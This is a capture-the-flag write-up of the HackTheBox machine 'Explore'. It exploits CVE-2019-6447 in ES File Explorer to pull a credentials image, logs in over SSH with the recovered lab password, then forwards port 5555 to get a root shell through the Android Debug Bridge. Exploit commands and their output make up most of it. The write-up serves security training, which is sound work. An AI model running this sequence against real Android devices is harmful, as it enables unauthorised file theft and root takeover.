Explore

htb

This was, in my opinion, a very easy machine on HackTheBox. The first step for gaining a foothold is in exploitation of a public vulnerability for which an exploit is readily available. This returns a set of valid SSH credentials. Then, port forwarding can be used to access the Android Debug Bridge (ADB) from the local network. Since ADB comes with root and shell commands, we can simply use this service to gain a shell as a high-privileged user.

Port Scan

Nmap scan report for 10.10.10.247
Host is up (0.037s latency).
Not shown: 65530 closed ports
PORT      STATE    SERVICE
2222/tcp  open     EtherNetIP-1
5555/tcp  filtered freeciv
42135/tcp open     unknown
43057/tcp open     unknown
59777/tcp open     unknown

Enumeration

Since we don’t know at this point what any of these ports are, let us run some service enumeration scripts using nmap:

$ nmap -sC -sV -p 2222,5555,42135,43057,59777 10.10.10.247
Nmap scan report for 10.10.10.247
Host is up (0.042s latency).
Not shown: 65530 closed ports
PORT      STATE    SERVICE VERSION
2222/tcp  open     ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp  filtered freeciv
42135/tcp open     http    ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
43057/tcp open     unknown
| fingerprint-strings:
|   GenericLines:
|     HTTP/1.0 400 Bad Request
|     Date: Sat, 18 Sep 2021 17:17:40 GMT
[...]
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).

Some googling shows that Banana Studio SSH server is exclusively available for Android. So, we know that we are likely attacking an Android machine. Port 5555 is then most likely the Android Debug Bridge or ADB, for which TCP/5555 is the default port.

Foothold

The most interesting port here seems to be the one with the ES File Explorer service, for which a public exploit is available.

The exploit can be downloaded and run without any modification. There are various commands available at this point which we can try. The listPics command returns some pictures, one of which is called creds.jpg. That sounds interesting.

$ python3 ./exploit.py listPics 10.10.10.247

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)

name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)

name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)

name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)

We can use getFile to download and look at the picture.

$ python3 ./exploit.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

[+] Downloading file...
[+] Done. Saved as `out.dat`.

Let’s look at it:

This does look very much like a username and password. Likely, a user uploaded the picture to remember their access credentials. The credentials kristi:Kr1sT!5h@Rp3xPl0r3! are in fact valid, and we can use them to log in via SSH on port 2222.

$ ssh kristi@10.10.10.247 -p 2222
Password authentication
Password:
:/ $ id
uid=10076(u0_a76) gid=10076(u0_a76) groups=[...]
:/ $

By the way, we can’t get the user flag yet at this point. We actually need to fully root the machine in order to get access to this location (in the /data directory).

Privilege Escalation

In order to gain administrative privileges, we need to go back to the start of our enumeration, when we discovered what we presumed to be Android Debug Bridge (ADB) on port 5555. This port was filtered, because ADB can generally only be accessed from the local network, which we weren’t on in the beginning. But now that we have SSH access, we can just set up port forwarding.

$ ssh kristi@10.10.10.247 -p 2222 -L 5555:127.0.0.1:5555

We can now access ADB on our own localhost. By perusing the ADB documentation, it turned out that this can be used to get a root shell. For this, we need to connect, then select a device, and then run the root and the shell command.

$ adb connect 127.0.0.1:5555
​* daemon not running; starting now at tcp:5037
​* daemon started successfully

$ adb devices
List of devices attached
127.0.0.1:5555  device
emulator-5554   device

$ adb -s 127.0.0.1:5555 root
restarting adbd as root
error: protocol fault (couldn't read status): Success

$ adb -s 127.0.0.1:5555 shell
x86_64:/ $ id
uid=0(root) gid=0(root) groups=0(root),[...]

This gives us full administrative access to the target machine.